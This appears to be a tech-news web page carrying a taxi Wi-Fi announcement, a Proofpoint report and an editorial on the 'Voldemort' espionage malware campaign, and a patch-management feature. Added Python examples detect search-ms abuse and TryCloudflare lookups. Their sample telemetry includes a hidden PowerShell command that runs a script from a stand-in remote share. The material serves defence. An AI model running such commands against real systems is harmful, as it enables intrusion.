Technology

Abu Dhabi taxis to offer free Smart Wi-Fi service

The Centre for Regulation of Transport by Hire Cars (the Centre) has officially announced its partnership with Telematics Networking & Communications LLC for the rollout of Smart Wi-Fi across its entire fleet of taxis in the Emirate of Abu Dhabi.

Passengers riding the Centre’s fleet of taxis in Abu Dhabi will enjoy a free Smart Wi-Fi service while on board, the largest and most innovative of its kind in the world. The rollout of the service will begin in November this year and is expected to be completed across the Centre’s entire fleet by mid-2017.

At Gitex Technology Week, Jamal Al Nuaimi, General Manager of Etisalat Abu Dhabi, and Esam Al Mazroei, Vice Chairman of Telematics, signed a five-year partnership agreement today. As part of the agreement, Etisalat, whose world-class network will power the high-speed and secure Smart Wi-Fi service, will deliver its network services and its machine-to-machine (M2M) platform, the M2M control centre for the largest connected-car platform in the region, to Telematics, to be deployed across the entire Abu Dhabi taxi fleet.

Telematics, together with its partner BlueGreen, has worked closely with the Centre to design this bespoke Smart Wi-Fi service, which, in addition to providing a secure and robust Wi-Fi network to passengers, will also give Abu Dhabi, and indeed the UAE, the largest mobile media service within taxis. The Wi-Fi service can be used to deliver smart value-added services, such as customer communication, satisfaction surveys and government citizen polls, and to let businesses and brands engage with their consumers without friction.

Speaking about this key initiative, Mr Mohammad Al Qamzi, General Manager of The Centre for Regulation of Transport by Hire Cars, said, “The Centre is constantly striving to enhance the passenger experience it delivers in its taxis. We are pleased to partner with Telematics and BlueGreen to bring this world-class Smart Wi-Fi service to our passengers, who can now avail of constant connectivity in our taxis for free, and also enjoy the bespoke value-added services it will deliver. We are confident this service will enhance passenger satisfaction and happiness, and thereby increase the use of our excellent public taxi service in Abu Dhabi.”

On the occasion of the launch of the Smart Wi-Fi service, Jamal Saeed Al Nuaimi, General Manager of Etisalat Abu Dhabi, said, “The UAE has always led the way in the region and globally to launch and implement smart technologies and services that make an impact in the way of life for residents in the country. Etisalat is today spearheading UAE’s smart city and digital transformation journey. We are proud to be associated with this strategic project that is a global first. This is set to transform the digital experience of passengers in Abu Dhabi taxis, and I am sure will set the benchmark for Smart Taxi services across the UAE.”

In line with its smart city solution portfolio, Telematics worked eagerly on this initiative to support “the visionary leadership of the UAE in its efforts to create innovative and world-class technological services that pave the way for building a knowledge-driven society,” said Esam Al Mazroei, Vice Chairman of Telematics. “We are very proud to be the key partner in this project, especially as a local technology company that strives to innovate in local and global markets.”

As announced in late September, the rollout will begin with Airport taxis and the Mercedes Vito Compact vans.

News

The Malware That Must Not Be Named: Suspected Espionage Campaign Delivers “Voldemort”


In August 2024, Proofpoint researchers identified an unusual campaign using a novel attack chain to deliver custom malware. The threat actor named the malware “Voldemort” based on internal filenames and strings used in the malware.

The attack chain comprises multiple techniques currently popular within the threat landscape as well as uncommon methods for command and control (C2), like the use of Google Sheets. Its combination of tactics, techniques, and procedures (TTPs), lure themes impersonating government agencies of various countries, and odd file naming and passwords like “test” are notable. Researchers initially suspected the activity might be a red team exercise. However, the large volume of messages and analysis of the malware very quickly indicated it was a threat actor.

Proofpoint assesses with moderate confidence this is likely an advanced persistent threat (APT) actor with the objective of intelligence gathering. However, Proofpoint does not have enough data to attribute with high confidence to a specific named threat actor (TA). Despite the widespread targeting and characteristics more typically aligned with cybercriminal activity, the nature of the activity and capabilities of the malware show more interest in espionage rather than financial gain at this time.

Voldemort is a custom backdoor written in C. It has capabilities for information gathering and to drop additional payloads. Proofpoint observed Cobalt Strike hosted on the actor’s infrastructure, and it is likely that is one of the payloads that would be delivered.

Beginning on 5 August 2024, the malicious activity included over 20,000 messages impacting over 70 organizations globally. The first wave of messages included a few hundred daily but then spiked on 17 August with nearly 6,000 total messages.

Messages purported to be from various tax authorities notifying recipients about changes to their tax filings. Throughout the campaign, the actor impersonated tax agencies in the U.S. (Internal Revenue Service), the UK (HM Revenue & Customs), France (Direction Générale des Finances Publiques), Germany (Bundeszentralamt für Steuern), Italy (Agenzia delle Entrate), and from August 19, also India (Income Tax Department), and Japan (National Tax Agency). Each lure was customized and written in the language of the authority being impersonated. 

Proofpoint analysts correlated the language of the emails with public information available on a select number of targets, finding that the threat actor chose the lure according to the intended victim’s country of residence rather than the country in which the targeted organization operates or the country or language that could be inferred from the email address. For example, certain targets in a multinational European organization received emails impersonating the IRS because their publicly available information linked them to the US. In some cases, the threat actor appears to have mixed up the country of residence when the target shared an uncommon name with a better-known person with a larger public presence. Emails were sent from suspected compromised domains, with the actor including the agency’s real domain in the email address.

The threat actor targeted 18 different verticals, but nearly a quarter of the organizations targeted were insurance companies. Aerospace, transportation, and university entities made up the rest of the top 50% of organizations targeted by the threat actor.

Proofpoint does not attribute this activity to a tracked threat actor. Based on the functionality of the malware and the data observed when examining the Google Sheet used for C2, information gathering was one objective of this campaign. While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives.

The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor’s capability and determine with high confidence the ultimate goals of the campaign. It is possible that large numbers of emails could be used to obscure a smaller set of actual targets, but it is equally possible the actors genuinely wanted to infect dozens of organizations. It is also possible that multiple threat actors with varying levels of experience in developing tooling and initial access worked on this activity. Overall, it stands out as an unusual campaign.

The behavior combines a variety of recently popular techniques observed in several disparate campaigns from multiple cybercriminal threat actors that have used similar techniques as part of ongoing experimentation across the initial access ecosystem. Many of the techniques used in the campaign are observed more frequently in the cybercriminal landscape, demonstrating that actors engaging in suspected espionage activity often use the same TTPs as financially motivated threat actors.

While the activity appears to align with espionage activity, it is possible that future activities associated with this threat cluster may change this assessment. In that case, it would indicate cybercriminal actors, while demonstrating some typical e-crime delivery characteristics, used customized malware with unusual features currently only available to the operators and not abused in widespread campaigns, as well as very specific targeting not normally seen in financially motivated campaigns.

Defense against observed behaviors includes restricting access to external file sharing services to only known, safelisted servers; blocking network connections to TryCloudflare if it is not required for business purposes; and monitoring and alerting on use of search-ms in scripts and suspicious follow-on activity such as LNK and PowerShell execution.
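As an added example (not Proofpoint’s detection content), the following Python applies the three defensive measures above to constructed process-creation and DNS telemetry: it flags search-ms launches whose UNC target is not a safelisted server, watches for LNK or PowerShell follow-on within a short window, and reports TryCloudflare lookups unless they are explicitly allowed. The event format, hostnames and thresholds are assumptions for the example.

```python
"""Toy detections for search-ms use, LNK/PowerShell follow-on and
TryCloudflare lookups. Added example, not Proofpoint's detection logic;
event records are a constructed stand-in for Sysmon/EDR telemetry."""
import re
from datetime import datetime, timedelta

SEARCH_MS = re.compile(r"search-ms:", re.I)
TRYCLOUDFLARE = re.compile(r"(^|\.)trycloudflare\.com$", re.I)
FOLLOW_ON = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SAFE_SHARES = {"files.corp.example"}   # known, safelisted file servers (assumed)
WINDOW = timedelta(minutes=5)          # how long after a search-ms launch we watch

# Constructed sample telemetry: one suspicious chain, then one routine script run.
EVENTS = [
    {"ts": "2024-08-17T09:00:00", "type": "process", "image": "explorer.exe",
     "cmd": r'explorer.exe "search-ms:query=Notice&crumb=location:\\webdav.example.net\docs"'},
    {"ts": "2024-08-17T09:00:04", "type": "process", "image": "explorer.exe",
     "cmd": r"explorer.exe \\webdav.example.net\docs\Tax_Notice.lnk"},
    {"ts": "2024-08-17T09:00:06", "type": "process", "image": "powershell.exe",
     "cmd": r"powershell.exe -w hidden -File \\webdav.example.net\docs\stage.ps1"},
    {"ts": "2024-08-17T09:00:07", "type": "dns", "query": "word-list-123.trycloudflare.com"},
    {"ts": "2024-08-17T11:30:00", "type": "process", "image": "powershell.exe",
     "cmd": r"powershell.exe -File C:\Scripts\nightly_backup.ps1"},
]

def search_ms_host(cmd):
    """Return the UNC host a search-ms 'location:' crumb points at, or None."""
    m = re.search(r"location:\\\\([^\\\s\"']+)", cmd, re.I)
    return m.group(1).lower() if m else None

def detect(events, allow_trycloudflare=False):
    """Return (timestamp, rule, detail) alerts for the given telemetry."""
    alerts, search_ms_times = [], []
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        if ev["type"] == "dns":
            if TRYCLOUDFLARE.search(ev["query"]) and not allow_trycloudflare:
                alerts.append((ev["ts"], "trycloudflare-dns", ev["query"]))
            continue
        cmd = ev["cmd"]
        if SEARCH_MS.search(cmd):
            search_ms_times.append(ts)
            host = search_ms_host(cmd)
            rule = "search-ms-launch" if host in SAFE_SHARES else "search-ms-unknown-share"
            alerts.append((ev["ts"], rule, cmd))
            continue
        # LNK or script-host execution shortly after a search-ms launch is the follow-on we care about.
        recently = any(ts - t <= WINDOW for t in search_ms_times)
        if recently and (".lnk" in cmd.lower() or ev["image"].lower() in FOLLOW_ON):
            alerts.append((ev["ts"], "search-ms-follow-on", cmd))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

The routine backup script two hours later is not flagged because it falls outside the follow-on window, which is the kind of tuning that keeps this rule from paging on every PowerShell launch.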

Proofpoint reached out to our industry colleagues about the activities in this report abusing their services, and their collaboration is appreciated.


Editorial

Voldemort Espionage Malware Campaign: A Familiar Threat with New Tricks


By: Srijith Kn

The Voldemort espionage malware campaign, which has made headlines for its widespread infiltration of organizations worldwide, has raised significant concerns among cybersecurity experts. While the name may invoke a sense of dread, cybersecurity professionals are downplaying its novelty, pointing out that the tactics used by the attackers are not as groundbreaking as they may seem.

Kevin Reed, Chief Information Security Officer at Acronis, explained that the campaign uses a blend of well-established methods seen in previous cyberattacks. “This may sound alarming, but the techniques used are far from revolutionary,” Reed said. “What we’re seeing is a ‘Frankenstein’ approach — combining well-known tools and methods in a logical manner to increase the chances of system compromise.”

One of the more common tactics employed by the Voldemort campaign is the use of malicious PowerShell scripts, a long-standing favorite among cybercriminals. Reed emphasized the importance of proper detection mechanisms to counter these familiar threats. “We encounter these types of malicious scripts frequently,” he noted. “That’s why having robust detection systems, like script emulation technologies such as those found in Acronis Cyber Protect, is critical to neutralize the threat early.”

Despite this reliance on traditional methods, there is one aspect of the Voldemort campaign that has raised eyebrows: the use of Google Sheets as a command-and-control (C2) platform. While this might sound innovative, Reed explained that it’s simply the latest iteration of a tactic used by hackers to exploit user-generated content platforms.

“It’s somewhat unusual to see Google Sheets being used for C2,” Reed said. “But we’ve seen attackers leverage various online platforms for similar purposes before. Social media platforms, like Instagram, have been used in the past — with one high-profile example involving command-and-control messages hidden in the comments section of Britney Spears’ Instagram account.”

The campaign’s success, Reed argues, is less about innovation and more about the persistence and resourcefulness of cybercriminals. Still, the real takeaway from this attack, according to the Acronis expert, is the need for preparedness. “The most important thing is to be ready with advanced cybersecurity tools that can detect and neutralize these types of threats,” Reed said.

As the Voldemort campaign continues to develop, cybersecurity professionals remain focused on the importance of vigilance, investing in robust detection systems, and keeping up with the ever-evolving landscape of cyber threats.


Features

Robust patch management. In the fight against ransomware, it’s time to get back to basics


By Saeed Abbasi, Product Manager, Vulnerability Research, Qualys Threat Research Unit (TRU)

In the Arab Gulf region, ransomware has become an epidemic. Since 2019, Saudi Arabia has been a top target for RansomOps gangs. And the GCC remained the most affected territory in the Middle East and Africa, as of 2023, showing a 65% increase over 2022 for instances of victims’ information being posted to data-leak sites. According to the Known Exploited Vulnerabilities (KEV) catalog, maintained by the Cybersecurity and Infrastructure Security Agency (CISA) under the U.S. Department of Homeland Security, approximately 20% of the 1,117 exploited vulnerabilities are linked to known ransomware campaigns. Attackers have become more relentless and more sophisticated, just as regional security teams have become more overworked and overwhelmed by their new hybrid infrastructures.

In today’s climate, senior executives approach discussions about cyber risk with the expectation of hearing unfavorable news. Indeed, matters have escalated of late with the emergence of human-mimicking AI. We used to take comfort in the fact that at least artificial intelligence could not be creative like people could. But that was before generative AI came along and left us speechless — with delight or dread, depending on our day job. For security professionals, it is the latter because every new technology that arrives will eventually get exploited by threat actors. AI and its generative subspecies can make it easier to find vulnerabilities, which implies there will be a surge in the volume of zero-days. And GenAI can pump out convincing phishing content at a scale unreachable by human criminals.

But in a break with tradition, I offer good news. In the daily struggle with ransomware threats, the answer lies in the daily fundamentals of IT admin. Patch management is the keystone of cyber resilience. As each vulnerability becomes known and fixes are released, that dreaded countdown begins again. Whether threat actors have beaten vendors to the punch by publishing an exploit before the patch was released or not, organizations must be prepared to act strategically when fixes become available. It may be that a patch fixes an error that poses no risk to the enterprise, in which case patching would not have much impact on reducing cyber risk. Hence, organizations need to look at prioritizing patching the assets that cause the most existential risk to the company, maximizing their patch rate (a measure of how effectively vulnerabilities are addressed) and minimizing their mean time to remediation (MTTR) for such “crown jewel” assets.

Windows mean doors

The Qualys Threat Research Unit (TRU) uses these metrics often in anonymized studies of organizations’ cyber-readiness. Our 2023 Qualys TruRisk Research Report found that weaponized vulnerabilities are patched within 30.6 days in 57.7% of cases, whereas attackers typically publish exploits for the same flaws inside just 19.5 days. That 11-day window is where our concerns should be concentrated. It should spur us to revisit patch management and — if we have not already — to integrate it into our cybersecurity strategy so we can start to close our open doors to attackers.

If we imagine a graph of MTTR plotted against patch rate for every vulnerability, then we can imagine four quadrants, defined by combinations of “high” or “low” for our two metrics. Our sweet spot is in the bottom right-hand corner, where patch rate is high and MTTR is low. We could call this quadrant the “Optimal Security Zone”. If a vulnerability is in this zone, we are unfazed by it. It is low-risk because it is patched and resolved quickly. In the top right, patch rate is still high but incidents take longer to remediate (high MTTR); we call this the “Vigilant Alert Zone”. While this is a higher source of concern, it is less worrying than a vulnerability that falls in the bottom left quadrant — the “Underestimated Risk Zone”. Here, we find overlooked vulnerabilities (low patch rates) but unexpectedly short remediation times. These flaws can quickly become risks if left unaddressed. Finally, we come to our red-flag quadrant, the “Critical Attention Zone” (top left), where vulnerabilities have low patch rates and take a long time to resolve.

Combining metrics like this can give us important crossover information that allows us to triage our patch management effectively. By exploring the critical areas first, we can examine overlooked vulnerabilities and discover either that they pose little threat and are less of a source of concern, or that they could lead to a ransomware incident, in which case they become a top priority on our to-do list. With RansomOps groups now leveraging advanced automation tools, the importance of optimal patch management cannot be overstated. Ensuring that systems are updated and secure is critical to prevent potential vulnerabilities.
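As an added illustration of the four-quadrant triage (example code, not Qualys’ own tooling), the following Python computes patch rate and MTTR from constructed per-asset patch records, places each vulnerability in its zone and orders them for attention. It assumes patch rate is the share of affected assets already patched, MTTR is the mean days to remediation on the patched assets, and the thresholds (80% patch rate, 19.5 days, the exploit-publication window quoted above) are illustrative choices.

```python
"""Four-quadrant patch triage from raw per-asset patch records.
Added example, not Qualys tooling; metric definitions and thresholds are assumptions."""
from statistics import mean

# Constructed records: for each vulnerability, days-to-patch per affected asset
# (None = asset still unpatched).
RECORDS = {
    "VULN-A": [3, 5, 4, 2, 6, 3, 4, 5, 2, 4],                          # patched fast, everywhere
    "VULN-B": [25, 40, 31, 28, 35, 30, 22, 27, None, 38],              # patched widely, but slowly
    "VULN-C": [2, 3, None, None, None, None, 4, None, None, None],     # few patched, but quickly
    "VULN-D": [45, None, None, 60, None, None, None, None, None, None],  # few patched, slowly
}

# (patch_rate_high, mttr_high) -> (zone name from the article, triage priority; 1 = first)
ZONES = {
    (True, False): ("Optimal Security Zone", 4),
    (True, True): ("Vigilant Alert Zone", 3),
    (False, False): ("Underestimated Risk Zone", 2),
    (False, True): ("Critical Attention Zone", 1),
}

def metrics(days_to_patch):
    """Patch rate (share of assets patched) and MTTR (mean days on patched assets)."""
    patched = [d for d in days_to_patch if d is not None]
    patch_rate = len(patched) / len(days_to_patch)
    mttr = mean(patched) if patched else float("inf")   # nothing patched yet: worst case
    return patch_rate, mttr

def classify(patch_rate, mttr, rate_threshold=0.8, mttr_threshold=19.5):
    """Map a (patch rate, MTTR) pair onto one of the four quadrants."""
    return ZONES[(patch_rate >= rate_threshold, mttr > mttr_threshold)]

def triage(records, **thresholds):
    """Return (vuln, zone, patch_rate, mttr) rows, Critical Attention Zone first."""
    rows = []
    for vuln, days in records.items():
        rate, mttr = metrics(days)
        zone, priority = classify(rate, mttr, **thresholds)
        rows.append((priority, vuln, zone, round(rate, 2), round(mttr, 1)))
    rows.sort()
    return [(vuln, zone, rate, mttr) for _, vuln, zone, rate, mttr in rows]

if __name__ == "__main__":
    for row in triage(RECORDS):
        print(*row)
```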

Action stations

Starting today, then, GCC organizations should look to their vulnerability management strategy and determine an approach that is able to stand up to armies of threat actors, working as a unified industry, equipped with advanced AI, to disrupt, disable, and damage the region’s innovative spirit. We all need to make sure that our vulnerability gaps are closed and our defenses tightened against these malicious actors. Technical and business stakeholders must collaborate on crafting roadmaps that make sense to their operational uniqueness.

The hope remains that one day, cyber criminals, a persistent threat today, will be effectively countered by innovative security technologies. However, we must confront the fact that attackers are becoming more sophisticated, their campaigns are escalating in scope, and the resources available for cybersecurity defense are often constrained.

The solution does not lie in an unknowable panacea, but in the day-to-day fundamentals — robust patch management that uses the four-quadrant principle and aims for the highest possible patch rate and the shortest possible resolution time. The top practitioners in any field — sports, business, the arts — will always extol the virtues of the fundamentals. If it works for them, then why not for us? So, let’s get back to basics and send the ransomware actor packing.

Copyright © 2023 | The Integrator